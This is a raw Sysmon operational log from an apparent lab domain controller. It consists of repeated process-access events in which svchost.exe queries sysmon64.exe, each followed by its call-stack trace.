10:40:10.166{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001372Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.166{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001371Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.166{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001370Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.166{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001369Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.166{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001368Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.166{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001367Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.166{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001366Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.166{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001365Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.166{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001364Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.166{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001363Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.166{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001362Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.166{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001361Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.166{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001360Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.166{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001359Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.151{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001358Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.151{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001357Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.151{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001356Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.151{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001355Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.151{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001354Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.151{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001353Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.151{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001352Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.151{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001351Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.151{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001350Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.151{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001349Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 